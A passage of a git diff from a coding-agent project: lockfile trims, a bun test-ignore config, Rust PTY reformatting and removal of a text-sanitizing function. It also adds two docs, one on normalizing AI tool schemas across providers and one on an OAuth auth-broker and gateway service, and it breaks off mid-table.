"sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA=="], - "@puppeteer/browsers/proxy-agent/agent-base": ["agent-base@7.1.4", "", {}, "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ=="], - - "@puppeteer/browsers/proxy-agent/http-proxy-agent": ["http-proxy-agent@7.0.2", "", { "dependencies": { "agent-base": "^7.1.0", "debug": "^4.3.4" } }, "sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig=="], - - "@puppeteer/browsers/proxy-agent/https-proxy-agent": ["https-proxy-agent@7.0.6", "", { "dependencies": { "agent-base": "^7.1.2", "debug": "4" } }, "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw=="], - - "@puppeteer/browsers/proxy-agent/lru-cache": ["lru-cache@7.18.3", "", {}, "sha512-jumlc0BIUrS3qJGgIkWZsyfAM7NCWiBcCDhnd+3NNM5KbBmLTgHVfWBcg6W+rLUsIpzpERPsvwUP7CckAQSOoA=="], - - "@puppeteer/browsers/proxy-agent/pac-proxy-agent": ["pac-proxy-agent@7.2.0", "", { "dependencies": { "@tootallnate/quickjs-emscripten": "^0.23.0", "agent-base": "^7.1.2", "debug": "^4.3.4", "get-uri": "^6.0.1", "http-proxy-agent": "^7.0.0", "https-proxy-agent": "^7.0.6", "pac-resolver": "^7.0.1", "socks-proxy-agent": "^8.0.5" } }, "sha512-TEB8ESquiLMc0lV8vcd5Ql/JAKAoyzHFXaStwjkzpOpC5Yv+pIzLfHvjTSdf3vpa2bMiUQrg9i6276yn8666aA=="], - - "@puppeteer/browsers/proxy-agent/proxy-from-env": ["proxy-from-env@1.1.0", "", {}, "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg=="], - - "@puppeteer/browsers/proxy-agent/socks-proxy-agent": ["socks-proxy-agent@8.0.5", "", { "dependencies": { "agent-base": "^7.1.2", "debug": "^4.3.4", "socks": "^2.8.3" } }, "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw=="], - "cliui/strip-ansi/ansi-regex": ["ansi-regex@5.0.1", "", {}, "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ=="], "cliui/wrap-ansi/ansi-styles": ["ansi-styles@4.3.0", "", { "dependencies": { "color-convert": "^2.0.1" } }, "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg=="], - "gaxios/https-proxy-agent/agent-base": ["agent-base@7.1.4", "", {}, "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ=="], - - "jszip/readable-stream/safe-buffer": ["safe-buffer@5.1.2", "", {}, "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g=="], - "jszip/readable-stream/string_decoder": ["string_decoder@1.1.1", "", { "dependencies": { "safe-buffer": "~5.1.0" } }, "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg=="], "log-update/slice-ansi/is-fullwidth-code-point": ["is-fullwidth-code-point@5.1.0", "", { "dependencies": { "get-east-asian-width": "^1.3.1" } }, "sha512-5XHYaSyiqADb4RnZ1Bdad6cPp8Toise4TzEjcOYDHZkTCbKgiUl7WTUCpNWHuxmDt91wnsZBc9xinNzopv3JMQ=="], @@ -1365,16 +1351,8 @@ "wrap-ansi/string-width/emoji-regex": ["emoji-regex@10.6.0", "", {}, "sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A=="], - "@puppeteer/browsers/proxy-agent/pac-proxy-agent/get-uri": ["get-uri@6.0.5", "", { "dependencies": { "basic-ftp": "^5.0.2", "data-uri-to-buffer": "^6.0.2", "debug": "^4.3.4" } }, "sha512-b1O07XYq8eRuVzBNgJLstU6FYc1tS6wnMtF1I1D9lE8LxZSOGZ7LhxN54yPP6mGw5f2CkXY2BQUL9Fx41qvcIg=="], - - "@puppeteer/browsers/proxy-agent/pac-proxy-agent/pac-resolver": ["pac-resolver@7.0.1", "", { "dependencies": { "degenerator": "^5.0.0", "netmask": "^2.0.2" } }, "sha512-5NPgf87AT2STgwa2ntRMr45jTKrYBGkVU36yT0ig/n/GMAa3oPqhZfIQ2kMEimReg0+t9kZViDVZ83qfVUlckg=="], - "cliui/wrap-ansi/ansi-styles/color-convert": ["color-convert@2.0.1", "", { "dependencies": { "color-name": "~1.1.4" } }, "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ=="], - "@puppeteer/browsers/proxy-agent/pac-proxy-agent/get-uri/data-uri-to-buffer": ["data-uri-to-buffer@6.0.2", "", {}, "sha512-7hvf7/GW8e86rW0ptuwS3OcBGDjIi6SZva7hCyWC0yYry2cOPmLIjXAUHI6DK2HsnwJd9ifmt57i8eV2n4YNpw=="], - - "@puppeteer/browsers/proxy-agent/pac-proxy-agent/pac-resolver/degenerator": ["degenerator@5.0.1", "", { "dependencies": { "ast-types": "^0.13.4", "escodegen": "^2.1.0", "esprima": "^4.0.1" } }, "sha512-TllpMR/t0M5sqCXfj85i4XaAzxmS5tVA16dqvdkMwGmzI+dXLXnw3J+3Vdv7VKw+ThlTMboK6i9rnZ6Nntj5CQ=="], - "cliui/wrap-ansi/ansi-styles/color-convert/color-name": ["color-name@1.1.4", "", {}, "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA=="], } } diff --git a/bunfig.toml b/bunfig.toml index dcc9eb340..279e4f11e 100644 --- a/bunfig.toml +++ b/bunfig.toml @@ -12,5 +12,15 @@ saveTextLockfile = true ".py" = "text" ".lark" = "text" +[test] +# bun test does NOT honor .gitignore; prune robomp's repo clones and +# scratch dirs so a root-level `bun test` doesn't walk into them. +pathIgnorePatterns = [ + "**/node_modules/**", + "python/robomp/data/**", + ".wt/**", + ".worktrees/**", +] + [run] bun = true diff --git a/crates/pi-natives/src/pty.rs b/crates/pi-natives/src/pty.rs index a41d66859..391100b57 100644 --- a/crates/pi-natives/src/pty.rs +++ b/crates/pi-natives/src/pty.rs @@ -217,7 +217,8 @@ fn run_pty_sync( ct: task::CancelToken, ) -> Result { let pty_system = native_pty_system(); - ct.heartbeat().map_err(|err| Error::from_reason(format!("PTY setup cancelled before openpty: {err}")))?; + ct.heartbeat() + .map_err(|err| Error::from_reason(format!("PTY setup cancelled before openpty: {err}")))?; const PTY_STARTUP_TIMEOUT: Duration = Duration::from_secs(5); let pair = if cfg!(windows) { @@ -227,9 +228,9 @@ fn run_pty_sync( let (tx, rx) = mpsc::channel(); std::thread::spawn(move || { let result = pty_system.openpty(PtySize { - rows: config.rows, - cols: config.cols, - pixel_width: 0, + rows: config.rows, + cols: config.cols, + pixel_width: 0, pixel_height: 0, }); let _ = tx.send(result); @@ -237,16 +238,18 @@ fn run_pty_sync( match rx.recv_timeout(PTY_STARTUP_TIMEOUT) { Ok(Ok(pair)) => pair, Ok(Err(e)) => return Err(Error::from_reason(format!("Failed to open PTY: {e}"))), - Err(_) => return Err(Error::from_reason( - "PTY creation timed out (5s). ConPTY may be unavailable on this system.", - )), + Err(_) => { + return Err(Error::from_reason( + "PTY creation timed out (5s). ConPTY may be unavailable on this system.", + )); + }, } } else { pty_system .openpty(PtySize { - rows: config.rows, - cols: config.cols, - pixel_width: 0, + rows: config.rows, + cols: config.cols, + pixel_width: 0, pixel_height: 0, }) .map_err(|err| Error::from_reason(format!("Failed to open PTY: {err}")))? @@ -273,14 +276,16 @@ fn run_pty_sync( cmd.env(key, value); } } - ct.heartbeat().map_err(|err| Error::from_reason(format!("PTY setup cancelled before spawn: {err}")))?; + ct.heartbeat() + .map_err(|err| Error::from_reason(format!("PTY setup cancelled before spawn: {err}")))?; let mut child = pair .slave .spawn_command(cmd) .map_err(|err| Error::from_reason(format!("Failed to spawn PTY command: {err}")))?; drop(pair.slave); - ct.heartbeat().map_err(|err| Error::from_reason(format!("PTY setup cancelled before reader: {err}")))?; + ct.heartbeat() + .map_err(|err| Error::from_reason(format!("PTY setup cancelled before reader: {err}")))?; let master = pair.master; let mut writer = master diff --git a/crates/pi-natives/src/text.rs b/crates/pi-natives/src/text.rs index a00a6badc..42c4fece0 100644 --- a/crates/pi-natives/src/text.rs +++ b/crates/pi-natives/src/text.rs @@ -1263,89 +1263,6 @@ pub fn extract_segments( }) } -// ============================================================================ -// sanitizeText -// ============================================================================ - -/// Strip ANSI escape sequences, remove control characters / lone surrogates, -/// and normalize line endings. -#[napi] -pub fn sanitize_text(text: JsString<'_>) -> Result, Utf16String>> { - let original = text; - let text_u16 = text.into_utf16()?; - let data = text_u16.as_slice(); - - let mut did_change = false; - let mut out: Vec = Vec::new(); - let mut last = 0usize; - let mut i = 0usize; - let len = data.len(); - - while i < len { - let u = data[i]; - - // Allow tab + newline; normalize CR by removing it. - if u == 0x09 || u == 0x0a { - i += 1; - continue; - } - - let mut remove_len = if u == ESC - && let Some(seq_len) = ansi_seq_len_u16(data, i) - { - seq_len - } else { - 0usize - }; - - if remove_len == 0 { - // Drop CR to normalize line endings. - if u == 0x0d { - remove_len = 1; - } else if u <= 0x1f || u == 0x7f || (0x80..=0x9f).contains(&u) { - // C0 + DEL + C1 controls. - remove_len = 1; - } else if (0xd800..=0xdbff).contains(&u) { - // High surrogate: keep only if followed by a valid low surrogate. - if i + 1 < len { - let lo = data[i + 1]; - if (0xdc00..=0xdfff).contains(&lo) { - i += 2; - continue; - } - } - remove_len = 1; - } else if (0xdc00..=0xdfff).contains(&u) { - // Lone low surrogate. - remove_len = 1; - } - } - - if remove_len == 0 { - i += 1; - continue; - } - - if !did_change { - did_change = true; - out = Vec::with_capacity(len); - } - if last != i { - out.extend_from_slice(&data[last..i]); - } - i += remove_len; - last = i; - } - - if !did_change { - return Ok(Either::A(original)); - } - if last < len { - out.extend_from_slice(&data[last..]); - } - Ok(Either::B(build_utf16_string(out))) -} - // ============================================================================ // visibleWidth // ============================================================================ diff --git a/docs/ai-schema-normalize.md b/docs/ai-schema-normalize.md new file mode 100644 index 000000000..a1a2e1e6b --- /dev/null +++ b/docs/ai-schema-normalize.md @@ -0,0 +1,171 @@ +# AI tool-schema normalization + +`@oh-my-pi/pi-ai` exposes one unified schema normalizer that providers consume +before tools are sent on the wire. All walkers live in +`packages/ai/src/utils/schema/normalize.ts`; the operational contract is +`packages/ai/src/utils/schema/CONSTRAINTS.md`. + +There is no separate `strict-mode.ts` module any more — OpenAI strict-mode +sanitization, OpenAI Responses `oneOf` rewriting, Google/Vertex/Gemini-CLI +sanitization, Cloud Code Assist Claude sanitization, and MCP sanitization all +share the same option-driven walk. + +## Entry points + +All exports live under `@oh-my-pi/pi-ai/utils/schema`: + +- `normalizeSchema(value, options)` — generic option-driven walker. +- `normalizeSchemaForGoogle(value)` — Gemini / Vertex / Gemini CLI. +- `normalizeSchemaForCCA(value)` — Cloud Code Assist Claude (Antigravity + GCA). +- `normalizeSchemaForMCP(value)` — MCP inputSchemas before they enter the + custom-tool registry. `tool-bridge.ts` runs every MCP `inputSchema` through + this dispatcher. +- `normalizeSchemaForOpenAIResponses(schema)` (alias + `sanitizeSchemaForOpenAIResponses`) — rewrites `oneOf` → `anyOf` for the + Responses family. +- `sanitizeSchemaForStrictMode(schema)` and + `enforceStrictSchema(schema)` / `tryEnforceStrictSchema(schema)` — the + OpenAI strict-mode pipeline (sanitize → enforce). All three are exported + from `normalize.ts`. +- `adaptSchemaForStrict(schema, strict)` from `./adapt` — thin composer that + wraps `tryEnforceStrictSchema` for provider call sites and consults + `PI_NO_STRICT` (env `PI_NO_STRICT`) for the global bypass. + +Removed in the unified-flow refactor: + +- `strict-mode.ts` (merged into `normalize.ts`). +- `sanitize-google.ts` and `normalize-cca.ts` (replaced by + `normalizeSchemaFor*` dispatchers). +- `StringEnum` helper — use `z.enum([...])` directly; Zod's emitted JSON + Schema is already wire-compatible with Google and other providers. +- `sanitizeSchemaFor{Google,CCA,MCP}` / `prepareSchemaForCCA` — renamed to + `normalizeSchemaFor{Google,CCA,MCP}`. + +## Dispatcher mapping + +| Provider transport(s) | Dispatcher | +| -------------------------------------------------------------------- | -------------------------------------------- | +| `openai-completions`, `openai-responses`, `openai-codex-responses` | `adaptSchemaForStrict` (sanitize + enforce) | +| `openai-responses` family (`oneOf` → `anyOf` only) | `normalizeSchemaForOpenAIResponses` | +| `google-generative-ai`, `google-vertex`, Gemini CLI | `normalizeSchemaForGoogle` | +| Cloud Code Assist Claude (Antigravity + GCA, `claude-*` model ids) | `normalizeSchemaForCCA` | +| MCP `inputSchema` ingestion | `normalizeSchemaForMCP` | +| `anthropic-messages` (native, not CCA) | per-provider whitelist in `anthropic.ts` | + +Gemini CLI / Antigravity CCA MUST run the full `normalizeSchemaForCCA` +pipeline (not just the first keyword-stripping pass) to keep parity with the +shared Google Claude path. + +## Walk semantics + +`normalizeSchema` first upgrades the input to JSON Schema 2020-12, then +walks the tree with the option set pinned by the dispatcher. Each node: + +1. Inlines `$ref` (see "Edge cases" below). +2. Renames `snake_case` combinator/property keys to camelCase + (`any_of` → `anyOf`, etc.; collisions follow python-genai + `pop(from)`/`set(to)` semantics — snake_case wins). +3. Applies the `handle_null_fields` collapse for nullable unions before + recursing into children. +4. Strips keys the target provider does not support, optionally lifting + human-meaningful keys (`pattern`, `format`, min/max, `default`, + `examples`, ...) into the sibling `description` via the spill formatter + (`spill.ts`). Structural/meta keys (`$ref`, `$defs`, + `additionalProperties`) are not spilled. +5. Normalizes type unions (`type: ["T", "null"]` → `type: "T"` + nullable + marker on Google, plain `type: "T"` on CCA). +6. Collapses object-only / same-type combiners, optionally lossy-collapses + mixed-type combiners (CCA only), and runs the residual-combiner fixpoint. +7. Validates against AJV 2020 when `validateAndFallback` is set (CCA path) + and emits the per-tool fallback `{ "type": "object", "properties": {} }` + on residual incompatibility — `type` array, `type: "null"`, `nullable` + key, or any remaining `anyOf`/`oneOf`/`allOf`. + +## OpenAI strict-mode pipeline + +`adaptSchemaForStrict(schema, strict)` runs `tryEnforceStrictSchema`, +which composes: + +1. **Sanitize** (`sanitizeSchemaForStrictMode`): strips non-structural + keywords (`format`, `pattern`, min/max, `examples`, `default`, + `if`/`then`/`else`, `not`, `unevaluated*`, `patternProperties`, + `dependent*`, `content*`, `min/maxProperties`, `$dynamicRef`, etc.). The + `default` value is inlined into the sibling `description` as + ` (default: X)` before being dropped, unless `description` already + contains `(default:` or no `description` exists. +2. **Enforce** (`enforceStrictSchema`): every object node gets + `additionalProperties: false`, every property goes into `required`, and + optional properties become nullable unions + (`anyOf: [, { "type": "null" }]`). Tuple `prefixItems` are + strictified recursively. + +The two passes share node-level caches and the same epoch-based cycle +guard, so a single walk on the wire path normalizes refs, allOf, and +nullable wrapping consistently. `tryEnforceStrictSchema` is fail-open: +if anything throws, it returns `{ strict: false, schema: original }` so +callers MUST emit `strict: true` only when enforcement actually succeeded. + +### Edge cases the strict-mode normalizer handles + +- **Local `$ref` inlining.** OpenAI strict mode rejects + `{ "$ref": "...", "description": "..." }` with sibling keys. The + sanitizer pre-resolves local `#/...` refs against the root and merges + with **sibling keys winning** over the resolved def — same precedence + as `openai-python`'s `_ensure_strict_json_schema`. Recursive refs are + guarded by the per-walk epoch. +- **Single-item `allOf`.** A `{ "allOf": [X], ...siblings }` collapses to + `{ ...X, ...siblings }` with the inlined entry's keys winning over the + original siblings (matches `openai-python`'s `_pydantic.py:79-83`). Multi- + item `allOf` is left intact for the downstream validator to reject if + needed. +- **Type-array branches and nullable unions.** When a node has + `type: ["T", "U"]`, the sanitizer emits one variant schema per type, + pruning type-specific keywords (e.g. `properties`/`required` only stay on + the `object` variant, `items` only on the `array` variant). The shared + `description` is **hoisted onto the `anyOf` wrapper** instead of being + duplicated on every branch — so a strict nullable union becomes + `{ anyOf: [T, { type: "null" }], description: "..." }`, not + `anyOf: [{ ..., description }, { ..., description }]`. +- **Enum/const without a `type`.** Both sanitize and enforce paths call + `inferStrictPrimitiveTypeFromEnumOrConst` to infer the primitive `type` + from `enum` / `const` values. Mixed-primitive enums (`[1, "two", null]`), + enums containing objects/arrays, and non-primitive `const` values + (`{a:1}`, `[1,2,3]`) cannot be described by a single `type` keyword and + trigger the strict-mode fail-open path — emitting a typeless schema + would just be rejected on the wire by OpenAI. + +## Performance: static fingerprint cache + +`resolveProviderModels` in `packages/ai/src/model-manager.ts` and +`readModelCache`/`writeModelCache` in `model-cache.ts` cooperate via a +schema-v3 `static_fingerprint` column on the `model_cache` SQLite table. + +- `fingerprintStatic(staticModels)` hashes the static catalog slice + (`Bun.hash(JSON.stringify(models))` in base36) and memoizes the result + in a per-process `WeakMap` keyed by the array reference. Multiple + cold-start arms calling `resolveProviderModels` with the same + `staticModels` array pay the JSON+hash cost once. +- On cache read, if the network fetch is being skipped, the cached row is + fresh + authoritative, and the cached `static_fingerprint` matches the + current one, `resolveProviderModels` returns the cached models verbatim + — the cache already incorporates the same static state, so re-running + `mergeDynamicModels(static, cache)` would just rebuild the same objects. +- `mergeModelSources` and `mergeDynamicModels` short-circuit on + empty-source inputs (the common shape after `(static, [])` or for + providers without a static catalog), avoiding Map churn entirely. + +Cache rows written before schema v3 are dropped by the cache-version +check; the column defaults to `''` for any row that survives a version +upgrade so the fingerprint-equality check naturally fails closed and the +full merge re-runs. + +## Related + +- `docs/models.md` — registry, equivalence, compat flags + (`supportsStrictMode`, `toolStrictMode`, `disableStrictTools`). +- `docs/provider-streaming-internals.md` — how the normalized schemas are + used downstream during the provider stream loop. +- `docs/mcp-server-tool-authoring.md` — MCP `inputSchema` ingestion via + `normalizeSchemaForMCP`. +- `packages/ai/src/utils/schema/CONSTRAINTS.md` — operational contract for + every normalization rule. diff --git a/docs/auth-broker-gateway.md b/docs/auth-broker-gateway.md new file mode 100644 index 000000000..07aabda59 --- /dev/null +++ b/docs/auth-broker-gateway.md @@ -0,0 +1,181 @@ +# Auth Broker and Auth Gateway + +The auth broker and auth gateway are two cooperating HTTP services that move OAuth refresh tokens and provider access tokens off developer laptops and into a single broker host. + +- **`omp auth-broker serve`** holds the canonical SQLite credential vault, performs OAuth refreshes, and exposes a small REST API (`/v1/snapshot`, `/v1/credential/:id/refresh`, `/v1/credential/:id/disable`, `/v1/credential`, `/v1/usage`, `/v1/healthz`). +- **`omp auth-gateway serve`** is a forward-proxy. It accepts OpenAI Chat Completions, Anthropic Messages, and OpenAI Responses requests, injects the broker-resolved access token, and forwards the bytes to the real provider. Clients (containerised omp, llm-git, the macOS usage widget, …) never see the access token. + +Transport security between operator, broker, and gateway is delegated to the operator (Tailscale / Wireguard / reverse proxy + TLS). Every endpoint except `/v1/healthz` (broker) and `/healthz` (gateway) requires a bearer token. + +Source: `packages/ai/src/auth-broker/`, `packages/ai/src/auth-gateway/`, `packages/coding-agent/src/cli/auth-broker-cli.ts`, `packages/coding-agent/src/cli/auth-gateway-cli.ts`, `packages/coding-agent/src/session/auth-broker-config.ts`. + +## Data flow + +``` + ┌────────────────────────────────────────────────────────────┐ + │ broker host │ + │ │ + developer ──▶ │ ┌──────────────────────────┐ ┌────────────────────┐ │ + laptop / │ │ omp auth-broker serve │◀──▶│ SQLite agent.db │ │ + CI / robomp │ │ - holds refresh tokens │ │ (canonical writer)│ │ + │ │ - background refresher │ └────────────────────┘ │ + │ │ /v1/{snapshot,refresh,…}│ │ + │ └─────────┬────────────────┘ │ + │ │ bearer ($CONFIG_DIR/auth-broker.token) │ + │ ▼ │ + │ ┌──────────────────────────┐ │ + │ │ omp auth-gateway serve │ RemoteAuthCredentialStore │ + │ │ /v1/{chat,messages,…} │ pulls /v1/snapshot at boot, │ + │ │ /v1/usage, /v1/models │ refreshes credentials by id │ + │ └─────────┬────────────────┘ via the broker on expiry │ + └────────────┼───────────────────────────────────────────────┘ + │ bearer ($CONFIG_DIR/auth-gateway.token) + ▼ + unauthenticated clients + (llm-git, macOS widget, robomp containers, IDE plugins, …) + │ + ▼ same path is forwarded with Authorization + api.anthropic.com / api.openai.com / … +``` + +The broker is the only writer of OAuth refresh tokens. Clients (including the gateway itself) load a redacted snapshot in which every `refresh` field has been replaced with `REMOTE_REFRESH_SENTINEL`; when an access token expires the client calls `POST /v1/credential/:id/refresh` and the broker performs the refresh server-side. `RemoteAuthCredentialStore` rejects any local code path that tries to write through it, with an error pointing at `omp auth-broker login` / `omp auth-broker logout`. + +## auth-broker + +### CLI + +``` +omp auth-broker serve [--bind=host:port] # boot the broker +omp auth-broker token [--regenerate] [--json] # print or rotate the bearer token +omp auth-broker login [--via=user@host] [--dry-run] +omp auth-broker logout +omp auth-broker import [--provider=] [--include-disabled] [--dry-run] [--json] +omp auth-broker migrate --from-local [--dry-run] [--json] +omp auth-broker status [--json] +``` + +- `serve` opens the local SQLite store at `getAgentDbPath()` and binds an HTTP listener (default `127.0.0.1:8765`). On startup a token is ensured at `/auth-broker.token` (mode `0600`, `0700` parent dir). The background refresher refreshes any OAuth credential whose `expires - Date.now() < refreshSkewMs` (default 5 min) every `refreshIntervalMs` (default 60 s). +- `token` prints the cached bearer or generates a new one. `--regenerate` rotates it. +- `login ` runs the per-provider OAuth flow locally, or — with `--via=user@host` — `ssh -L :127.0.0.1: user@host omp auth-broker login ` so the OAuth callback hits the local browser but the credential is written on the broker host. Built-in callback ports: `anthropic:54545`, `openai-codex:1455`, `google-gemini-cli:8085`, `google-antigravity:51121`, `gitlab-duo:8080`. +- `logout ` deletes every credential row for ``. +- `import ` imports CLIProxyAPI-style JSON credentials into the local SQLite store. Maps `type` field → omp provider (`claude → anthropic`, `codex → openai-codex`, `gemini → google-gemini-cli`, `antigravity → google-antigravity`, `gemini-cli → google-gemini-cli`). +- `migrate --from-local` walks the local SQLite store + env-derived credentials and idempotently uploads them to the configured broker (`POST /v1/credential`). +- `status` health-pings the configured remote broker. + +### Endpoints + +| Method | Path | Auth | Purpose | +| ------ | ---- | ---- | ------- | +| `GET` | `/v1/healthz` | none | Liveness + version | +| `GET` | `/v1/snapshot` | bearer | Redacted snapshot (refresh tokens replaced by sentinel) | +| `POST` | `/v1/credential` | bearer | Upsert one OAuth or API-key credential | +| `POST` | `/v1/credential/:id/refresh` | bearer | Force-refresh one OAuth credential | +| `POST` | `/v1/credential/:id/disable` | bearer | Disable one credential with a recorded cause | +| `GET` | `/v1/usage` | bearer | Aggregate `UsageReport[]` across credentials | + +Requests use `Authorization: Bearer `. The server compares against an in-memory token allow-list; the gateway’s implementation uses a timing-safe comparison. + +### Background refresher + +`AuthBrokerRefresher` iterates active OAuth credentials at `refreshIntervalMs` cadence and refreshes any within `refreshSkewMs` of expiry. Refreshes are single-flighted per credential id so a slow refresh cannot be retriggered. The refresher distinguishes: + +- **definitive failures** (`invalid_grant`, `invalid_token`, `revoked`, unauthorized refresh-token, 401/403 not from a network blip) — credentials are passed to `AuthStorage.disableCredentialById(id, cause)` so the next snapshot pull surfaces a clean delete on the client; +- **transient failures** (timeout / ECONNREFUSED / fetch failed) — left in place for the next sweep. + +## auth-gateway + +### CLI + +``` +omp auth-gateway serve [--bind=host:port] [--no-auth] +omp auth-gateway token [--regenerate] [--json] +omp auth-gateway status [--json] +``` + +- `serve` requires `OMP_AUTH_BROKER_URL` (or `auth.broker.url` in `config.yml`) — the gateway is itself a broker client. It calls `AuthBrokerClient.fetchSnapshot()`, wraps it in `RemoteAuthCredentialStore`, and constructs an `AuthStorage` that resolves access tokens through the broker. Default bind is `127.0.0.1:4000`. The gateway token is stored at `/auth-gateway.token` (`0600`); `--no-auth` disables the bearer check entirely (loopback-only use). +- `token` / `status` mirror the broker’s equivalents. + +### Endpoints + +| Method | Path | Auth | Purpose | +| ------ | ---- | ---- | ------- | +| `GET` | `/healthz` | none | Liveness + version | +| `GET` | `/v1/usage` | bearer | Aggregate `UsageReport[]` (proxied through `AuthStorage`) | +| `GET` | `/v1/models` | bearer | Bundled-model catalog filtered to providers with credentials | +| `POST` | `/v1/chat/completions` | bearer | OpenAI Chat Completions wire format | +| `POST` | `/v1/messages` | bearer | Anthropic Messages wire format | +| `POST` | `/v1/responses` | bearer | OpenAI Responses wire format | + +The model id is read from the top-level `model` field. The gateway picks the first bundled `Model` matching that id and: + +- **Passthrough fast-path** — when the inbound wire format matches the model’s native API (`openai-chat → openai-completions`, `anthropic-messages → anthropic-messages`, `openai-responses → openai-responses`), the request body is forwarded byte-for-byte with the client `Authorization`/`x-api-key` stripped and replaced by `Authorization: Bearer `. Provider-specific fields (`cache_control`, `service_tier`, tool-choice extensions, …) flow through unmodified. Hop-by-hop headers (RFC 7230) plus `Content-Encoding`/`Content-Length` are stripped from the upstream response. +- **Translate path** — when the inbound format and the resolved model’s API differ (e.g. `/v1/chat/completions` targeting an Anthropic model, or `/v1/responses` targeting `openai-codex-responses` which runs over a websocket transport), the request is parsed against the wire schema, rebuilt into an omp `Context`, dispatched through `streamSimple()`, and re-encoded back to the inbound format (SSE for streamed responses). + +`idleTimeout` on the underlying `Bun.serve` is set to `255 s` so long thinking-budget calls do not get killed by Bun’s default idle timeout. + +## Usage cache: server-side 5-min jitter + client-side 15 s single-flight + +Two layers cache the aggregate provider-usage report. Both are intentional and stacked. + +### Server-side cache (broker `AuthStorage`) + +`AuthStorage` caches each credential’s `UsageReport` in the broker’s SQLite store at a **5-minute per-credential TTL with ±25 % jitter**. Anthropic and OpenAI rate-limit `/usage` aggressively per source IP, and a synchronized 5-credential fan-out trips 429s every cycle; the jitter decorrelates refresh times within a few cycles. On fetch failure the store keeps the **last-good** report for up to 24 h with a short jittered re-poll window — so a transient upstream blip never blanks out the widget. + +Constants: `USAGE_REPORT_TTL_MS = 5 * 60_000`, `USAGE_LAST_GOOD_RETENTION_MS = 24 * 60 * 60_000` (`packages/ai/src/auth-storage.ts`). + +### Client-side single-flight (`RemoteAuthCredentialStore`) + +When the gateway (or any other broker client) calls `fetchUsageReports()` / `getUsageReport(provider, credential)`, `RemoteAuthCredentialStore` coalesces concurrent calls into a single `GET /v1/usage` round-trip and caches the result for **15 s** in memory. + +- `USAGE_CACHE_TTL_MS = 15_000` (`packages/ai/src/auth-broker/remote-store.ts`). +- A single `#usageInflight` promise is shared across all callers; a per-caller `AbortSignal` is **raced** against the shared promise, not threaded into it, so one caller’s abort never cascades into a peer’s in-flight request. +- On fetch failure the rejected promise is logged and the awaited value is `null` — callers (`AuthStorage.fetchUsageReports`, `#getUsageReport`) treat a `null` report as "no usage signal for this cycle" and proceed without it. **This is the 15 s TTL fallback**: the client absorbs transient broker outages by suppressing the error, returning `null` to ranking, and re-attempting after the 15 s window. + +The 15 s client window deliberately sits below the broker’s 5 min server cache, so almost every client poll is served from the broker’s already-cached value; the client cache exists to absorb the parallel fan-out generated by `AuthStorage.#rankOAuthSelections` into a single broker round-trip. + +## Operator opt-in + +The broker is **off** unless `OMP_AUTH_BROKER_URL` (or `auth.broker.url` in `config.yml`) is set. When set, `discoverAuthStorage` in `packages/coding-agent/src/sdk.ts` swaps the local SQLite credential store for `RemoteAuthCredentialStore` and every API call resolves credentials through the broker. + +### Environment variables + +| Variable | Purpose | Required when | +| -------- | ------- | ------------- | +| `OMP_AUTH_BROKER_URL` | Base URL of the remote auth-broker (e.g. `https://broker.tailnet:8765`). Selecting this puts the client in broker mode — local SQLite is bypassed. | Any time the omp client should resolve credentials through a broker (and required by `omp auth-gateway serve`). | +| `OMP_AUTH_BROKER_TOKEN` | Bearer token used for every broker endpoint except `/v1/healthz`. | When `OMP_AUTH_BROKER_URL` is set and no token is available from `auth.broker.token` or `/auth-broker.token`. | + +Resolution order in `resolveAuthBrokerConfig()`: + +1. `OMP_AUTH_BROKER_URL` env (else `auth.broker.url` from `config.yml`, with `$ENV_NAME` resolution); +2. `OMP_AUTH_BROKER_TOKEN` env (else `auth.broker.token` from `config.yml`, else `/auth-broker.token`); +3. URL set but no token resolvable → hard error pointing at the token file path. + +The gateway has no dedicated env vars — it inherits `OMP_AUTH_BROKER_*` because it is itself a broker client. + +### `config.yml` keys + +| Key | Default | Purpose | +| --- | ------- | ------- | +| `auth.broker.url` | unset | Same as `OMP_AUTH_BROKER_URL`; env wins. Hidden from the settings UI. | +| `auth.broker.token` | unset | Same as `OMP_AUTH_BROKER_TOKEN`; env wins. Values may be the literal token or `$ENV_NAME` to indirect through env. | + +### Token files + +| Path | Owner | Mode | +| ---- | ----- | ---- | +| `/auth-broker.token` | `omp auth-broker serve` (created at first start) | `0600` in a `0700` parent dir | +| `/auth-gateway.token` | `omp auth-gateway serve` (skipped under `--no-auth`) | `0600` in a 